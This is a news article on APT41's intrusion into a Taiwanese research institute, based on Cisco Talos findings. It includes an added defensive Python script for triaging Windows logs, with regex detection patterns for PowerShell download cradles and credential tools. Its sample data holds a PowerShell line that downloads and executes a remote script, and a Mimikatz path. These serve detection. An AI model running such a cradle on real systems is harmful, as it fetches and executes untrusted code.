China-linked advanced persistent threat group APT41 has reportedly compromised a government-affiliated institute in Taiwan focused on research in advanced computing and related technologies. The intrusion, which began in July 2023, saw the threat actor gain initial access to the victim environment through unidentified means. Subsequently, APT41 deployed a range of malware tools, including the notorious ShadowPad remote access Trojan, the Cobalt Strike post-compromise tool, and a custom loader that injects malware by exploiting a 2018 Windows remote code execution vulnerability (CVE-2018-0824).
APT41 is a designation used by various security vendors to monitor a loose coalition of China-centric threat groups known for engaging in cyber espionage and financially motivated attacks worldwide since 2012. Notable members of the group include Wicked Panda, Winnti, Barium, and SuckFly, who have targeted organizations in the United States and several other countries, pilfering trade secrets, intellectual property, and other sensitive data in recent years.
Recent reports from Mandiant indicate that APT41 has expanded its targets to include global shipping and logistics companies, as well as organizations in the technology, entertainment, and automotive sectors. Despite the U.S. government indicting several members of APT41 in 2020, the group’s operations have not slowed down.
The academic research conducted by the Taiwan-based institute made it a valuable target for APT41, as discovered by researchers at Cisco Talos. The intrusion was detected during an investigation into abnormal activity involving attempted downloads and executions of PowerShell scripts in the institute’s network environment. According to Talos researchers Joey Chen, Ashley Shen, and Vitor Ventura, the nature of the research work conducted at the institute made it an attractive target for threat actors seeking to obtain proprietary and sensitive technologies.
ShadowPad, a malware first uncovered in NetSarang Computer’s Xmanager source code back in 2017, was one of the tools used by APT41 in the attack on the Taiwan research institute. Initially believed to be exclusively utilized by APT41, ShadowPad has since been associated with multiple China-linked threat groups involved in cyber espionage campaigns and software supply chain attacks. In the Taiwan incident, APT41 deployed two different ShadowPad versions using distinct techniques for malicious activities within the compromised environment.
The attackers used ShadowPad to run commands that mapped the victim network, gathered host data, and searched for other exploitable systems on the network. Additionally, the threat actors harvested passwords and user credentials stored in web browsers using tools such as Mimikatz and WebBrowserPassView. As part of their attack strategy, APT41 also deployed the Cobalt Strike post-compromise tool on the victim network, using a loader cloned from a GitHub project to evade antivirus detection.
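Two of the behaviours described above, PowerShell scripts being downloaded and executed (which is how Talos first noticed the intrusion) and credential-harvesting tools such as Mimikatz and WebBrowserPassView being launched, are the kind of thing a defender can triage from Windows event logs. The following is an added example, not code from the Cisco Talos report or from the article: a small filter over constructed event records (script block logging, event ID 4104, and process creation, event ID 4688). The field names, host names, user names, the URL and the detection patterns are assumptions chosen for this illustration, not indicators taken from the incident.

```python
"""Added example: triage Windows event records for the two behaviours the
article mentions. Event layout and all sample values are constructed."""
import re
from dataclasses import dataclass

# Indicators of a PowerShell "download cradle": fetch a script over HTTP and
# run it in memory. Illustrative patterns, not an exhaustive detection list.
FETCH_PATTERNS = [
    re.compile(r"Net\.WebClient", re.I),
    re.compile(r"DownloadString|DownloadFile", re.I),
    re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
]
EXEC_PATTERNS = [
    re.compile(r"Invoke-Expression|\biex\b", re.I),
    re.compile(r"-enc(odedcommand)?\s", re.I),
]

# Process names of the credential-harvesting tools named in the article.
CREDENTIAL_TOOLS = {"mimikatz.exe", "webbrowserpassview.exe"}


@dataclass
class Event:
    event_id: int   # 4104 = PowerShell script block, 4688 = process creation
    host: str
    user: str
    detail: str     # script block text (4104) or command line (4688)


@dataclass
class Alert:
    host: str
    user: str
    rule: str
    evidence: str


def count_indicators(text: str) -> int:
    """Number of distinct cradle indicators (fetch or execute) present."""
    return sum(1 for p in FETCH_PATTERNS + EXEC_PATTERNS if p.search(text))


def image_name(command_line: str) -> str:
    """Executable file name from a command line (assumes no spaces in the path)."""
    return command_line.split()[0].rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return alerts for download cradles and known credential tools."""
    alerts = []
    for ev in events:
        if ev.event_id == 4104:
            # Require both a fetch and an execute indicator to limit noise from
            # ordinary administrative scripts that only download or only eval.
            fetch = any(p.search(ev.detail) for p in FETCH_PATTERNS)
            execute = any(p.search(ev.detail) for p in EXEC_PATTERNS)
            if fetch and execute:
                alerts.append(Alert(ev.host, ev.user, "ps_download_cradle", ev.detail[:80]))
        elif ev.event_id == 4688:
            image = image_name(ev.detail)
            if image in CREDENTIAL_TOOLS:
                alerts.append(Alert(ev.host, ev.user, "credential_tool", image))
    return alerts


# Constructed sample records (hosts, users, URL and paths are made up).
SAMPLE_EVENTS = [
    Event(4104, "ws-research-07", "lab\\analyst1",
          "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"),
    Event(4104, "ws-research-07", "lab\\analyst1",
          "Get-ChildItem C:\\Data | Measure-Object"),
    Event(4688, "ws-research-07", "lab\\analyst1",
          "C:\\Users\\Public\\mimikatz.exe"),
    Event(4688, "ws-research-07", "lab\\analyst1",
          "C:\\Windows\\System32\\notepad.exe"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"{alert.host} {alert.user} {alert.rule}: {alert.evidence}")
```

Requiring both a fetch and an execute indicator in one script block is a deliberate trade-off: it misses cradles split across several blocks, but it keeps routine scripts that merely download a file from paging an analyst. The process-name match is only a first-pass filter, since renamed binaries will not trigger it; it should sit alongside hash- or behaviour-based rules.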
The use of steganography to conceal the Cobalt Strike beacon shellcode within an image further highlighted the sophisticated tactics employed by APT41 in their cyber campaign. The researchers at Cisco Talos observed various commands and techniques used by the threat actors to extract valuable information from compromised systems, showcasing the extent of the intrusion and the group’s capabilities in stealth and persistence.
Overall, the compromise of the Taiwan research institute by APT41 underscores the ongoing threat posed by advanced persistent threat groups to organizations worldwide. The incident serves as a reminder of the importance of cybersecurity measures and vigilance to defend against sophisticated cyber threats targeting valuable intellectual property and proprietary technologies.
